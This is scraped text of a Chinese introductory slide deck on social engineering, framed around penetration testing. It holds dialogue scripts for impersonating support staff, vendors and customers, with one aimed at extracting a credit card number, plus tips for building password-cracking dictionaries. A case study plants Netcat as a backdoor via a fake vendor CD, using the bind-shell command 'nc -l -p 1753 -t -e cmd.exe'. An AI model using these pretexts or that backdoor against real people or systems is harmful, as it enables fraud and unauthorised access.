收藏 分销(赏)

社会工程学入门PPT.ppt

上传人:天**** 文档编号:10149014 上传时间:2025-04-23 格式:PPT 页数:32 大小:939KB
下载 相关 举报
社会工程学入门PPT.ppt_第1页
第1页 / 共32页
社会工程学入门PPT.ppt_第2页
第2页 / 共32页
点击查看更多>>
资源描述
单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,社会工程学入门,By,:,HUC,缘生,1,社会工程学(,Social Engineering,),社会工程学是一,种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段。,取得自身利益的手法,近年来已成迅速上升甚至滥用的趋势。那么,什么算是社会工程学呢?,它并不能等同于一般的欺骗手法,社会工程学尤其复杂,即使自认为最警惕最小心的人,一样会被高明的社会工程学手段损害利益。,社会工程学陷阱就是通常以交谈、欺骗、假冒或口语等方式,从合法用户中套取用户系统的秘密。,社会工程学是一种与普通的欺骗和诈骗不同层次的手法。,因为社会工程学需要搜集大量的信息针对对方的实际情况,进行心理战术的一种手法。,系统以及程序所带来的安全往往是可以避免的。而在人性以及心理的方面来说。,社会工程学往往是一种利用人性脆弱点、贪婪等等的心理表现进行攻击,是防不胜防的。,借此我们从现有的社会工程学攻击的手法来进行分析,借用分析来提高我们对于社会工程学的一些防范方法。,熟练的社会工程师都是擅长进行信息收集的身体力行者。,很多表面上看起来一点用都没有的信息都会被这些人利用起来进行渗透。,比如说一个电话号码,一个人的名字。后者工作,ID,的号码,都可能会被社会工程师所利用。,在猫扑网上发现流传着一句话,那就是我们所说的人肉搜索达人,社会工程学身体力行者。,2,许多人都说,关掉了的计算机才是安全的计算机,但这是错误的,找个借口让人去办公室打开它就是了。,你的对手不仅仅有一种方法可以从你那里得到他想要的信息,这只是时间的问题。耐心、个性和坚持,这正是欺骗的艺术的切入点。要击败安全措施,一个攻击者、入侵者,或是社会工程师,必须找到一个方法,从可信用户那里骗取信息,或是不露痕迹的获得访问权。当可信用户被欺骗、影响,并被操纵而吐露出敏感信息时,或是做出了不当的举动,从而让攻击者有漏洞可钻时,什么样的安全技术也无法保护住你的业务了。正如同密码专家有时通过寻找漏洞来绕过加密技术解出密文一样,社会工程师通过欺骗你的雇员来绕过安全技术。信任的弊端,大多数情况下,成功的社会工程师都有着很强的人际交往能力。他们有魅力、讲礼貌、讨人喜欢,并具有快速建立起可亲、可信感的特点。一个经验丰富的社会工程师,使用他自已的战略、战术,几乎能够接近任何他感兴趣的信息。,精干的技术专家辛辛苦苦地设计出安全解决方案来最小化使用计算机的风险,然而却没有解决最大的漏洞,人为因素。尽管我们很聪明,但对我们人类,你、我、他的安全最严重的威胁,来自于我们彼此之间。,3,每个读者都一直在被社工,他们的父母所控制着,他们有办法(比如:,“,这是为了你好,”,)让你去做他们认为最应该做的事。父母们就是使用类似社会工程学的方法,巧妙的编出看似有理的故事、理由以及借口,来达到他们的目的。是的,我们都被我们的父母所引导,那些乐善好施的(偶尔也不完全如此)社会工程师们。如果某个陌生人帮了你的忙,然后要你帮他,不要不经过慎重考虑就回报他的帮助,要看对方要你做的是什么。社会工程师找了一个计算机知识很少的人。他知道的越多,就越可能产生怀疑,或越能断定是被骗了。计算机白痴,对计算机操作和知识了解很少的人,则很容易遵从你的指示。他太容易掉入,“,只需下一个小程序,”,这样的陷井了,因为他对一个软件程序可能造成的损害一无所知。而且,他很可能不知道他冒着风险放到网络上的信息的价值。,4,一、社会工程学的应用与防护,5,1,、假冒技术支持,社会工程攻击的方法何很多,下面介绍假冒技术支持战术:可以考察以下用于获取数据网络访问权的不同伪装示例。最成功的社会工程师是那些能够以创新的方法劝导其他人向其提信息的人。,社会工程的最常见形式是假冒技术支持这里假冒一名正在手机信息的技术支持工程师,收集的信息包括口令。,渗透测试者:你好,我是技术支持部的张涛你注意到你的系统变慢了吗?,受骗用户:还好,似乎还不太慢,渗透测试者:嗯,我们看到网络速度下降很多 好的让我登录你的,PC,上,测试一下你的机器。你的用户名是,jeouser,,对吗,?,受骗用户:是。,一般来说,用户名与电子邮件地址中的名称相同。比如,,如果电子邮件地址为,jeouse,。那么在企业网络中的用户名很可能就是,jeouser,。我们可以从大多数企业的,Web,网站收集电子邮什地址。,6,渗透测试者:很好,让我查一查你的口令嗯,系统太慢了,你的口令是什么?,受骗用户:是,abc123,。,渗透测试者:好,我进去了。似乎还不太坏。一定是没有受到同楼层其他用户的影响,奇怪。好了,我要查一查其他楼层的情况。谢谢你。,受骗用户:也谢谢你的帮助。,7,这个示例展示了一个技术支持假冒的策略。在现实场景中,应该向用户询问更多问题以便建立用户对你的信任。在了解企业内部网络的过程中加入一些幽默元素。,企业网络中最容易被忽略和未加保护的区域是在家庭中办公的远程工作人员使用的机器。作为渗透测试人员,应该测试这些远程用户。通常情况下,对这些人实施社会工程更容易获得成功,原因在于他们远离办公室,而在办公室的人员可能会受到安全培训和提醒。远程用户通常是通过电话或支持人员的帮助来处理一些设置情况的。,8,2,、第三方假冒,技术支持假冒的缺点之一是这个假冒是在太常见了。公司已经意识到这种假冒技巧并要求防范。另一种技巧是第三方假冒,它能够更成功的获取内部信息。,渗透测试者:你好,我是,“,值得信赖咨询公司,”,的工作人员,我想给你介绍一下我们公司新的防火墙产品。,受骗用户:不错,但我们对现有产品已经很满意了,渗透测试者:真的吗,?,你们正在使用哪种类型的防火墙,受骗用户:我们现在用,PlX,和,Netscreell,防火墙,渗透测试者:好,这两款产品都十分优秀,但你注意到了像,Smurl,和,Ping Of Death,这样的拒绝服务攻击的风险了吗。你的防火墙能够抵挡这些类型的攻击吗,?,(Smurf,攻击是以最初发动这种攻击的程序名,Smurl,来命名。这种攻击方法结合使用了,IP,欺骗和,ICMP,回复方法使大量网络传输充斥目标系统,引起目标系统拒绝为正常系统进行服务,)(,这种攻击通过发送大于,65536,字节的,ICMP,包促操作系统崩溃;通常不可能发送大于,65536,个字节的,ICMP,包,但可以把报文分割成片段,然后在目标主机上重组:最终会导致被攻击目标缓冲区溢出。,),9,受骗用户:当然能。,渗透测试者:不错,我知道你对现有的产品很满意现在,我们的产品能够通过特殊过滤有效地保护电子邮件服务器。你的产品能够保护邮件服务器吗,?,受骗用户:这个问题我们并不关心,因为我们不允许互联网上的邮件进入到我们的系统中。我们的邮件都来自总部。,渗透测试者:喔,看起来你对现有产品很满意。我不浪费你的时间了。我把我的电话号码和姓名留给你,在你需要的时候可以给我打电话(留下一个假名和假的电话号码原因在于目标或许永远不会打这个电话,),。,在这个简短的示倒中,你能够发现防火墙的类型及它的一些配置。你会了解到,该公司或许阻塞或限制了,ICMP,协议,,Smurf,、和,Ping Of Death,攻击使用了这个协议。你还知道电子邮件系统使用的,TCP,端口,25,不能通过互联网访问。这样就节省了扫描这些协议的大量时间,减少了被发现的风险。,10,第三方假冒的另一个示例是你假装为某个贸易杂志的记者,你正在做公司产品的评论。绝大多数员工期待知道他们会在杂志中出现。在他们的热功期待中,经常会送出免费产品,泄露不应该与外界分享的内部信息。这就是为什么公关人员应该出现在会面中样品产品只应该在验证了访问者的身份之后才能够发放的原因。,你或许会发现,当,IT,经理认为他正在面谈有关他的数据安伞时他愿意泄露什么的信息。,11,渗透测试者:到目前为止,你为保护你的基础设施的安奎采取的步骤给我留下了很深刻的印象、,(,拍马屁是打开更多信息大门的第一步,,),受骗用户:谢谢,在我们公司,我们把安全看得十分重要。,渗透测试者:我已经感受到了。你们公司强制实施什么安全策略了吗?,受骗用户:嗯,当然,我们制定了可接受的互联网采略和口令策略,公司的所有员工在进入公司时都要签署这些策略。,渗透测试者:很不错详细谈一谈,这很有趣。,受骗用户:嗯,例如,我们的口令策略要求所有用户的口令至少要八个字符长并且同时包含字母和数字。要求口令每三个月就要更换一次口令。,渗透测试者:真的不错,我听说,有些公司也强制实施这样的策略,但员工可能会写下他们的口令,并把它放在键盘下面 你们公司存在这样的问题吗?,受骗用户:哈哈哈是的,总是滋生这样的情况我希望能蝣杜绝发生这样的事情我敢打赌我们的用户中有,50,上的用户会把口令写在他们办公桌的某个地方。,这个简短的会面揭示,获取进入公司权限的最容易的办法就是在用户的办公桌上寻找口令。你可在当天的晚些时候进入办公楼许要求使接待休息事。在下班之后,(,以及打扫卫生人员进来之前,),,你可以离开休息室走进办公率在办公桌上寻找能够得到访问权的口令。,12,这里是曾经发生的一个示例。几年前,马杰去一家不动产公公司在管理员离开之后的安全性。当他走到管理员的办公桌前他发现了几张马匹的照片,马杰猜想他一定拥有其中的一些马匹,就故意对旁边的小隔间大声感叹,,“,哇,多么漂亮的马呀,!,,这是他的马吗,?,”,在得到了肯定之后,马杰问,“,他们叫什么名字,?,”,果然,网络管理员使用的口令是这些马匹的名字之一。,13,3,、末端用户假冒、客户假冒、反向社会工程,一、末端用户假冒,如果你能够进入到企业办公楼中,你可以假冒末端用户打电话给支持中心。从找到 一台未用的工作站开始。当它引导起来后,工作站通常显示最后一个使用它的用户的名称。按下来,多次在密码提示框中键入一些伪造的口令。正常情况下这将导致该账户被锁起来并要求出系统管理员解锁。,打电话给支持中心,并假装你就是那个用户。告诉,IT,工作人员你忘记了口令,并且已经把自己锁在了网络之外。之后他会解锁你的账户并向你提供一个新的口令。现在你就以那个用户置录到网络上。你会为这个伎俩成功的概率之高感到吃惊。,14,二、客户假冒,如果说还有什么地方需要社会工程师进行测试,那就是客户服务中心。客户服务代表有权限访问账号、信用卡号码以及社会安全号码,(,在美国,其他国家往往是身份证号码,),。假设渗透测试人员使用下面的场景打电话给信用卡客户服务中心:,渗透测试者:喂,我要查一查我卡上的余额。,受骗用户:没问题,你的账号是多少,?,渗透测试者:不好意思,信用卡现在没有在我手边。但我有我的地址。,(,你会发现可以很容易地使用电话号码本采查到地址,),受骗用户:没有你的账号号码,我无法给你查账户信息。,渗透测试者:帮帮忙吧。今天是我,50,周年结婚纪念日,我的妻子现在正在医院。,我想在下班后给她买一些补品,但不能肯定我的账户上是否还有足够的钱。你能帮我查一查余额还有多少吗,?,谢谢你。,受骗用户:好吧。你的地址是什么,?,假设告诉了对方某个地址,客户服务人员说出了余额,继续下面的谈话:,渗透测试者:真是太感谢你了。我想网上订购一些东西,在今天就交竹到我妻子那里。给她一个惊喜。嗯,但我现在手头没有账户号码。你可以帮我念一念账户号码吗,?,受骗用户:好的。号码是,15,但是信用卡公司不会落入这样的陷阱。他们为什么不会落入这类陷阱的原因是他们雇佣了渗透测试人员作为社会工程师对客户代表进行了测试,并制定了严厉的惩罚措施。正是这个原因,伪装为公司内部人员打电话通常会更容易成功。,16,三、反向社会工程,反向社会工翟比前面舶示例要略微复杂一些,但它的有效性不容怀疑。反向社会工程,(Reverse Social Engineering,,,RSE),由下述三步组成:,破坏,广告,支持,在反向社会工程中,角色颠倒了过来。这里,不是像前一节讲述的那样打电话寻求帮助攻击者让用户给他打电话来寻求帮助。反向社会工程的操作方法是首先破坏目标网络,这可以通过拒绝服务攻击,(DoS),来实现。之后向该公司发送广告,以网结安全工程师的身份推荐你的服务,说明在对抗拒绝服务攻击方面体的特殊技能。当公司雇用了你的服务之后,你开始提供支持井修复问题,与此同时。在公司网络中安装后门程序,这样你可以在以后需要的时候进入到公司网络中。,成功实施反向社会工程的最佳途径并不是一开始就发起攻击,而足等待到互联网上传播一种新的病毒时发起攻击。以在病毒防护方面的特殊技能作为内容发布你的服务广告,当你在修复公司问题的时候,建立一种通过开启防火墙或安装后门程序的方法,打开从互联网上进入该公司网络的通道。,作为渗透测试人员,这一点变得极为困难,原因在于在第一次测试之后,IT,工作人员开始熟悉了你。对于利用下次病毒在互联阿上发作进行此类攻击,你应该得到管理层的书面允许。,17,这个案例研究要求渗透测试者李明被应用来对一所小学做社会工程测试。其目标是获取学校系统的访问权限修改学生的成绩。,18,李明要做的第一步工作就是了解这所学校使用的学籍管理软件。他开始在互联同上进行搜索寻找通用的学籍管理软件。李明找到了一些这样的软件,包括,ActiD,、,Gradebook,、,AutoGrad,、,Grade Genie,、,ThinkWave,,,Next 5 G,ading,、共拓学籍管理、点通学藉管理等。李明也浏览了一些教育论坛寻找讨论各学搜使用,IT,技术的情况。,通过收集这方面的情况,事明找到了附近的一所小学,名字为,”,东方小学,”,。掌握了这些情况之后,李明在打电话时就胸有成竹了。,李明打电话给这所学校,请求与负责技术的人员通话。对方将他介绍绐一位名叫马涛的技术人员。下面是他们之间的淡话:,李明:你好,是马涛马先生吗,?,我是李明,我在附近的,“,惠民小学,”,工作领导刚分配我负责学校的技术工作,但说实话,我对技术了解不多,因此我希望能够得到你的帮助。,至此,事明已经说出了他的期待。由于人们通常都乐于帮助别人,李明认如马涛会乐于帮助他。,马涛;李明你好。你在惠民小学?赵华怎么了,?,我知道她在那所学校负责技术,李明:呵呵,她现在不做这个工作了。但现拉她升官了。我是她的手下,她是一个很好的人。,19,尽管看起来李明就要露馅了,但谎称赵华升职了。李明还通过赞扬她的话语来使谈话更轻松起来。,李明:最近,赵华让我考察一下新的学籍管理软件的事情。我看了几个软件比如:共拓学籍管理、一点通学藉管理等但我不能确定哪一个软件最灵活,你们用的是哪个学籍管理软件?,李明陈述了自己在学籍管理软件方面的知识,来免除马涛对自己教育背景的怀疑李明还询问马涛哪一个软件软件最灵活,原因在于他在论坛中已经看到这些软件的流行程度和灵活程度的排名。,马涛:我们一直在使用,Gradebook,对这个软件我们很满意。,至此,李明继续问一些与这个软件有关的问题,依据是事先对这个软件的了解。当谈话结束时,李明已经知道了这个学校使用的学籍软件的类型负责技术的工作人员的姓名是马涛。,在下一个阶段,李明选择了另一个人与马涛联系,原因在于他可能会听出李明的声音。此外,由于马涛是位男士,常言道,男女搭配干活不累,因此,李明请他的同事王晨冒充,ThinkWave,的销售代表来打这个电话。在与马涛联系之前,王晨等待了数周,以避免惹人注目。,20,王晨:你好,是马涛吗,?,我是,ThinkWave,公司的业务代表王晨。我们想请你参加我们的客户改进计划,作为回报,在未来软件升级时,贵校可以得到,20,的折扣。,由于大多数公办学校的资金都比较紧张,因此可以合理地认为马涛会被这个省钱的说辞打动。,马涛:是吗,?,需要我做些什么,?,王晨:这样,我将向你发送一款报告软件,你把它放在服务器上。在发送给你的邮件中,包含了这个软件的配置方法。这个软件的主要功能是。在系统出现任何错误时他都生成一份报告,并发送给我们。它不发送任何个人信息仅仅发送计算机的类型、发生错误的时间、发生错误时系统中运行的进程。通过从我们的客户那里收集这些信息我们希望在未来的发行版本中能够减少软件错误。,马涛:很好呀。,在这次通话之后,李明从网上下载,ThinkWave,的标志,并在信纸的抬头上印上这个标志。李明在网上找到,FainkWave,的地址,并向马涛寄送一个包裹,寄件人地址写上,ThinkWave,的地址。包括中包含了一张带有,Nctcat,实用程序,(,当然你也可以使用其他的木马程序,),的,CD,和一封信,信的内容为:,21,马先生,你好:,感谢参与本公司客户改进计划。我们确认你的协助将会帮助改进我们产品未来发行版本的质量。与这封信一起寄给您的十一章包含报告软件的,CD,。当系统中发生错误时这个软件将会生成一份报告,并发送给我们。我向你保证不会发送任何个人信息。安装这个报告程序的方法是将,CD,放到服务器光驱中,它将自动启动安装程序,如果没有启动的话,使用,setup.exe,安装。,这个报告程序使用,TCP,端口,1753,,您需要在防火墙上打开这个端口。打开这个端口的具体方法,请参阅您的防火墙文档。,通过参与我们的客户改进计划,在未来软件升级时,你将自动得到,20%,的折扣。感谢你的支持和参与。,祝身体健康、一切顺利!,ThinkWave,公司代表 王晨,2007,年,4,月,26,日,22,CD,的内容是李明生成的一个安装程序,它将,Netcat,安装在服务器硬盘的根目录下:,Netcal,是一个后门应用程序,它为李明提供了进入服务器的远程访问。安装脚本使用下面的参数启动,Netcat,:,c:nc-l-p 1753-t-e cmd.exe,数天之后,李明请王晨打电话给马涛。,王晨:你好,我是王晨,我这次打电话是想问一问你,在安装我们的报告软件时遇到什么问题了没有,?,马涛:没有,一点问题也没有。,王晨:这就好。我们就想听到这样的话。现在我们需要知道你的外部,IP,地址,以便在我们收到报告时,知道这份报告来自你那里。,马涛:没问题。我查一查,找到了,,IP,地址是,200,300,55,28,王晨:太谢谢你了。如果你有什么需要,就告诉我们。你有我们的技术支持电话号码吗。,马涛:我有。,23,然后,你懂的,24,3,、,密码心理学,(转自红盟论坛),很多黑客的入门是从破解口令开始的!而是解密口令变成了由为重要的一门毕修课,今天我想谈的不是如何去破解口令,而是一篇关于口令的心理学文章!如果下述的一些列子正好与你的口令设置大同小异,那么请你马上改了它,你的口令被破解的可能性很大很大!,25,当我们设定口令时一般的人都会用自己熟悉的单词,这样能使他们便于记忆!没办法,人天生就懒惰!那么哪些单词是他们容易记住的那!是不是没有规律呢?非也!非也!我们可以来做一个心理试验!试验是这样的我从大学中抽出了一百名学生,然后要他们写下二个单词!并告诉他们这个单词是用于电脑的口令非常重要,且将来的使用率也很高!要求他们尽量慎重考虑!,26,1,,用自己的中文拼音者最多。,37,人这就告诉我们口令破解字典档应针对中国的特列!要用一些中文姓名拼音的字典档!如:,wanghai,zhangli,shenqin,等等!,2,,用常用的英文单词,23,人其中许多人都用了很有特定意义的单词,如,:hello,good,happy,anything,等等!,3,,用计算机的中经常出现的单词,18,人这些单词中还有操作系统的命令,如:,system,command,copy,harddisk,mouse,等等!,4,,用自己的出生日期,7,人其中年月日各不相同!但其中有,3,人用了中国常用 的日期表示方法!如,970203,199703.050498,等!上述测试中两个单词相同的有,21,人,接近相同的有,33,人!虽然还有一些人用的我没给他们归类,但还是有规律的!希望上面的心理测试能给你的解密带来一写启示!而不要在盲目的用暴力法了!,27,如何做一个红客,!,新手必看!,1.,世界上的技术是人类发明出来的,但并不是说人家就有义务给你免费分享,2.,不要老是抱怨没有高手教你,你应该看到你自己本身的程度提出的问题是不是值得人家花时间,你的时间宝贵人家也是,3.,最好的学习地方是论坛上,人家已经发出来的帖子还有整集整集的资料,你没有资格去要求人家重新再告诉你一次,如果让你把一句话重复给几万个人听你也会不愿意的,4.,用一个软件入侵成功就叫自己黑客或者红客的人那是弱智,等于有位智者说的第一个吃螃蟹的人是勇者,第二个是弱智,5.,学好基础的东西,,c,语言是每个黑客必须掌握的语言,这个是前辈的教训我们得听,但是学习一门语言光学不够还要自己动手做,不要老是沉溺于,a,b,c,i,j,k,n,m,加来减去,有很多优秀的源代码在论坛的资料库里等着你,28,6.,记住一句话,学技术先学做人!科学技术是一把双刃刀,杀人救人取决于所用之人,如果你想跟全世界为敌,可以,你先自己称称自己的重量,7.,尊重你身边的人,红客不是一种高高在上的职位,你没有资格看不起你身边的人,所谓王者也得礼贤下士,更何况比你厉害的人不止一堆,8.,前辈的话必须听,人家吃的盐比你吃的饭还要多,但是你也必须要有自己的个性和原则,不能盲目而从,所以我们的经验是:走自己的路,听别人的劝。遇事先冷静,5,秒钟,再作决定,9.,跟第一条相反,有些东西你必须教给后辈的,你就得教。比如如何做好一个红客,如何从零开始,如何守好自己的技术道德,教好后辈不走歧路是一个前辈的责任,10.,最后一点,红客是中国的一种文化,无论是以身为红客还是准备踏进红客这个文化大门的你和我,都是有责任让它发扬光大,29,安全不是一件产品,它是一个过程。,”,-,布鲁斯,?,施尼尔,近一步说,安全不是技术问题,它是人和管理的问题。由于开发商不断的创造出更好的安全科技产品,攻击者利用技术上的漏洞变得越来越困难。于是,越来越多的人转向利用人为因素的手段来进行攻击。穿越人这道防火墙十分容易,只需打一个电话的成本和冒最小的风险。,30,只有两种事物是无穷尽的,宇宙和人类的愚蠢。但对于前者,我不敢确定。,-,爱因斯坦,最终,社会工程学的攻击,成功于人们的愚蠢或更为普遍的对信息安全实践上的无知。,31,社会工程师 一个无所顾忌的魔术师,用他的左手吸引你的注意,右手窃取你的秘密。他通常十分友善,很会说话,并会让人感到遇上他是件荣幸的事情。,-,凯文,.,米特尼克,32,
展开阅读全文

开通  VIP会员、SVIP会员  优惠大
下载10份以上建议开通VIP会员
下载20份以上建议开通SVIP会员


开通VIP      成为共赢上传
相似文档                                   自信AI助手自信AI助手

当前位置:首页 > 包罗万象 > 大杂烩

移动网页_全站_页脚广告1

关于我们      便捷服务       自信AI       AI导航        抽奖活动

©2010-2025 宁波自信网络信息技术有限公司  版权所有

客服电话:4009-655-100  投诉/维权电话:18658249818

gongan.png浙公网安备33021202000488号   

icp.png浙ICP备2021020529号-1  |  浙B2-20240490  

关注我们 :gzh.png    weibo.png    LOFTER.png 

客服